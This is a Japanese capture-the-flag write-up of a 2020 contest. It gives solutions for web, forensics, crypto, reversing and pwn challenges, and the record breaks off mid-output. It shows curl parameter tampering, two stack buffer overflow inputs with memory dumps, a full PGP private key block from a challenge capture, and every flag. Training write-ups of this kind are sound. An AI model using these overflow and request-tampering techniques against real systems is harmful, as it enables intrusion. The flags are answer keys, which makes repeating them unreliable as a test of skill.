この大会は2020/8/21 18:30(JST)~2020/8/22 14:30(JST)に開催されました。
今回もチームで参戦。結果は4146点で146チーム中29位でした。
自分で解けた問題をWriteupとして書いておきます。
Base64 ;) (Web)
jwtファイルが添付されている。https://jwt.io/でデコードする。
{ "alg": "HS256", "typ": "JWT" } { "id": 34, "username": "admin", "password": "pCTF{jwt_t0k3ns_ar3_gr3}", "iat": 1596844412 }
pCTF{jwt_t0k3ns_ar3_gr3}
Koment (Web)
HTMLソースを見ると、コメントにフラグが書いてあった。
<!-- Don't forget to see comments here's your flag pCTF{C00m3nts_4r3_ev3rywh3re}-->
pCTF{C00m3nts_4r3_ev3rywh3re}
Break It (Web)
Yesを選びたいがNoしかクリックできないので、curlで"yes"を送信する。
$ curl -d 'flag=yes' http://webchallenge.cybsec.in:9000/get_flag <html> <head> <title>almost there</title> </head> <body style="color:white;"> Almost there, Nice, client side security is weak! Now instead of saying "yes" or "no", say "hacker"<br><br> </body> </html>
さらに"hacker"を送信する。
$ curl -d 'flag=hacker' http://webchallenge.cybsec.in:9000/get_flag pCTF{cyb3rc0ps_pl4n_d1d_n0t_w0rk}
pCTF{cyb3rc0ps_pl4n_d1d_n0t_w0rk}
Eclipse(Forensics)
$ file Eclipse.txt Eclipse.txt: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 680x512, frames 3
拡張子をjpgにして開いてみる。
2進数が並んでいる。
01110000 01100011 01110100 01100110 01111011 00110001 01110100 00100111 00110101 01011111 01100100 00110100 01110010 01101011 01111101
バイナリデコードする。
codes = '01110000 01100011 01110100 01100110 01111011 00110001 01110100 00100111 00110101 01011111 01100100 00110100 01110010 01101011 01111101' codes = codes.split(' ') flag = '' for code in codes: flag += chr(int(code, 2)) print flag
実行結果は以下の通り。
pctf{1t'5_d4rk}
pCTF{1t'5_d4rk}
Jiffy (Forensics)
ヘッダを見ると、LOL89aになっている。GIF89aに修正し、画像ファイルとして開いてみる。
アニメーションGIFになっているので、フレームの画像の文字列を順に結合するとフラグになる。
pctf{TH15_W45_EA5Y_BRE45Y}
pCTF{TH15_W45_EA5Y_BRE45Y}
Kirit0 (Forensics)
$ exiftool kirit0.jpeg ExifTool Version Number : 10.10 File Name : kirit0.jpeg Directory : . File Size : 16 kB File Modification Date/Time : 2020:08:21 23:10:16+09:00 File Access Date/Time : 2020:08:21 23:21:18+09:00 File Inode Change Date/Time : 2020:08:21 23:10:16+09:00 File Permissions : rwxrwxrwx File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Exif Byte Order : Big-endian (Motorola, MM) X Resolution : 1 Y Resolution : 1 Resolution Unit : None Y Cb Cr Positioning : Centered Compression : JPEG (old-style) Thumbnail Offset : 202 Thumbnail Length : 4001 Image Width : 183 Image Height : 275 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 183x275 Megapixels : 0.050 Thumbnail Image : (Binary data 4001 bytes, use -b option to extract)
サムネイルを抽出する。
$ exiftool -b kirit0.jpeg > thumbnail.jpg
thumbnail.jpgのヘッダのごみを削除して、画像ファイルとして開く。
pCTF{W3_411_l0v3_th3_8l4ck_Sw0rdsM4n}
$root (OSINT)
"$root of cybsec"で検索すると、以下のページが見つかる。
https://aakash-kumar.me/
aboutのページを見ると、フラグが書いてあった。
pCTF{1_4m_r00t}
Entrance - BankHeist (Pwn)
notsecretの値を適当なデータで上書きして、異なるデータにすればよい。
メモリの状況が見えるので、わかりやすい。適当に61バイト入力する。
$ nc pwnchallenge.cybsec.in 1337 Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret 0x7ffdfd384cb0 | 00 00 00 00 00 00 00 00 | 0x7ffdfd384cb8 | 00 00 00 00 00 00 00 00 | 0x7ffdfd384cc0 | 00 00 00 00 00 00 00 00 | 0x7ffdfd384cc8 | 00 00 00 00 00 00 00 00 | 0x7ffdfd384cd0 | ff ff ff ff ff ff ff ff | 0x7ffdfd384cd8 | ff ff ff ff ff ff ff ff | 0x7ffdfd384ce0 | 00 00 00 00 00 00 00 00 | 0x7ffdfd384ce8 | ef be ad de 00 ff ff ff | 0x7ffdfd384cf0 | 00 4d 38 fd fd 7f 00 00 | 0x7ffdfd384cf8 | 14 83 49 6b 76 55 00 00 | Input your text: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret 0x7ffdfd384cb0 | 61 61 61 61 61 61 61 61 | 0x7ffdfd384cb8 | 61 61 61 61 61 61 61 61 | 0x7ffdfd384cc0 | 61 61 61 61 61 61 61 61 | 0x7ffdfd384cc8 | 61 61 61 61 61 61 61 61 | 0x7ffdfd384cd0 | 61 61 61 61 61 61 61 61 | 0x7ffdfd384cd8 | 61 61 61 61 61 61 61 61 | 0x7ffdfd384ce0 | 61 61 61 61 61 61 61 61 | 0x7ffdfd384ce8 | 61 61 61 61 61 00 ff ff | 0x7ffdfd384cf0 | 00 4d 38 fd fd 7f 00 00 | 0x7ffdfd384cf8 | 14 83 49 6b 76 55 00 00 | Uhmm... door breaked due to overflow. pCTF{L0ck3r_D00r_br34k3d}
pCTF{L0ck3r_D00r_br34k3d}
Logs (Web)
http://webchallenge.cybsec.in:8080/assets/js/customjs.jsを見る。
c=[112,67,84,70,123,106,52,118,52,115,99,114,49,112,116,95,49,115,95,52,108,115,48,95,98,52,100,125]; var s = ''; for (var i = 0; i < c.length; i++) { s+=String.fromCharCode(c[i]) } console.log(s);
このASCIIコードをデコードする。
codes = [112, 67, 84, 70, 123, 106, 52, 118, 52, 115, 99, 114, 49, 112, 116, 95, 49, 115, 95, 52, 108, 115, 48, 95, 98, 52, 100, 125] flag = '' for code in codes: flag += chr(code) print flag
pCTF{j4v4scr1pt_1s_4ls0_b4d}
waSTEGate (Forensics)
$ file png.png png.png: Zip archive data, at least v2.0 to extract $ mv png.png png.zip $ unzip png.zip Archive: png.zip creating: cd/ inflating: cd/cctv.jpeg extracting: cd/flagishere.txt $ steghide extract -sf cd/cctv.jpeg Enter passphrase: wrote extracted data to "notflag.txt". $ cat notflag.txt pCTF{cL4rk_1v4N_<3_$}
pCTF{cL4rk_1v4N_<3_$}
KEY :) (Forensics)
smtpでフィルタリングし、TCP Streamを見てみる。
220 debian ESMTP Postfix (Debian/GNU) mail from: sysadmin@sneakymailer.htb 250 2.1.0 Ok rcpt to: airisatou@sneakymailer.htb 250 2.1.5 Ok daa 502 5.5.2 Error: command not recognized data 354 End data with <CR><LF>.<CR><LF> -----BEGIN PGP PUBLIC KEY BLOCK----- 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 =57Ft -----END PGP PUBLIC KEY BLOCK----- ......[silver@parrot]...[~/Desktop/Phantomctf3/smtpsniffer] ............ $cat priv.asc -----BEGIN PGP PRIVATE KEY BLOCK----- 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 HfV7sOelJl3UCkRito8HMe3v/1POCA== =ilmd -----END PGP PRIVATE KEY BLOCK-----
秘密鍵をsecret.keyとしてインポートする。
$ gpg --import --allow-secret-key-import secret.key gpg: 鍵リング「/home/ctf/.gnupg/secring.gpg」ができました gpg: 鍵リング「/home/ctf/.gnupg/pubring.gpg」ができました gpg: 鍵F4263647: 秘密鍵をインポートしました gpg: /home/ctf/.gnupg/trustdb.gpg: 信用データベースができました gpg: 鍵F4263647: 公開鍵"argenestel (pCTF{N0t_A_g00d_Plac3}) <heyhello@heyhello.weeb>"をインポートしました gpg: 処理数の合計: 1 gpg: インポート: 1 (RSA: 1) gpg: 秘密鍵の読み込み: 1 gpg: 秘密鍵のインポート: 1
pCTF{N0t_A_g00d_Plac3}
SherlocK (Crypto)
Vigenere暗号と推測して、https://www.dcode.fr/vigenere-cipherで復号する。pCTFで始まるよう鍵を調整して、推測しながら復号する。鍵がPEPPERのときに、フラグになった。
pCTF{goodjobsherlock}
Sharkinthewire (Forensics)
smtpでフィルタリングし、TCP Streamを見てみる。
220 debian ESMTP Postfix (Debian/GNU) mail from: cyber@sneakymailer.htb 250 2.1.0 Ok rcpt to: airisatou@sneakymailer.htb 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> Subject: Insecure SMTP hey airisatou I want to inform you your password is pCTF{sh4rk_1n_th3_w1r3} just to remind you please change your password and don't send over smtp . 250 2.0.0 Ok: queued as 365B5248C5 .[6~mail from: airisatou@sneakymailer.htb 502 5.5.2 Error: command not recognized quit 221 2.0.0 Bye
pCTF{sh4rk_1n_th3_w1r3}
Segmentation Fault (Reverse Engineering)
Ghidraでデコンパイルする。
void print(void) { undefined *puVar1; char *flg; char rb; char lb; char g; char a; char l; char f; puVar1 = (undefined *)malloc(0x15); *puVar1 = 0x77; puVar1[1] = 0x33; puVar1[2] = 99; puVar1[3] = 0x6f; puVar1[4] = 0x6e; puVar1[5] = 0x37; puVar1[6] = 0x72; puVar1[7] = 0x30; puVar1[8] = 0x6c; puVar1[9] = 0x74; puVar1[10] = 0x68; puVar1[0xb] = 0x33; puVar1[0xc] = 0x62; puVar1[0xd] = 0x31; puVar1[0xe] = 0x6e; puVar1[0xf] = 0x61; puVar1[0x10] = 0x72; puVar1[0x11] = 0x69; puVar1[0x12] = 0x33; puVar1[0x13] = 0x73; puVar1[0x14] = 0; printf("%c%c%c%c%c%s%c\n",0x70,0x43,0x54,0x46,0x7b,puVar1,0x7d); return; }
ASCIIコードをデコードする。
codes = [0x70, 0x43, 0x54, 0x46, 0x7b, 0x77, 0x33, 99, 0x6f, 0x6e, 0x37, 0x72, 0x30, 0x6c, 0x74, 0x68, 0x33, 0x62, 0x31, 0x6e, 0x61, 0x72, 0x69, 0x33, 0x73, 0x7d] flag = '' for code in codes: flag += chr(code) print flag
pCTF{w3con7r0lth3b1nari3s}
Locker - BankHeist (Pwn)
secretを"flag"で上書きすればよい。
メモリの状況が見えるので、わかりやすい。適当な56バイトの後に"flag"を入力する。
$ nc pwnchallenge.cybsec.in 1338 Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret 0x7fff8f6e0400 | 00 00 00 00 00 00 00 00 | 0x7fff8f6e0408 | 00 00 00 00 00 00 00 00 | 0x7fff8f6e0410 | 00 00 00 00 00 00 00 00 | 0x7fff8f6e0418 | 00 00 00 00 00 00 00 00 | 0x7fff8f6e0420 | ff ff ff ff ff ff ff ff | 0x7fff8f6e0428 | ff ff ff ff ff ff ff ff | 0x7fff8f6e0430 | 00 00 00 00 00 00 00 00 | 0x7fff8f6e0438 | ef be ad de 00 ff ff ff | 0x7fff8f6e0440 | 50 04 6e 8f ff 7f 00 00 | 0x7fff8f6e0448 | 44 33 84 c9 f2 55 00 00 | Input some text: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret 0x7fff8f6e0400 | 61 61 61 61 61 61 61 61 | 0x7fff8f6e0408 | 61 61 61 61 61 61 61 61 | 0x7fff8f6e0410 | 61 61 61 61 61 61 61 61 | 0x7fff8f6e0418 | 61 61 61 61 61 61 61 61 | 0x7fff8f6e0420 | 61 61 61 61 61 61 61 61 | 0x7fff8f6e0428 | 61 61 61 61 61 61 61 61 | 0x7fff8f6e0430 | 61 61 61 61 61 61 61 61 | 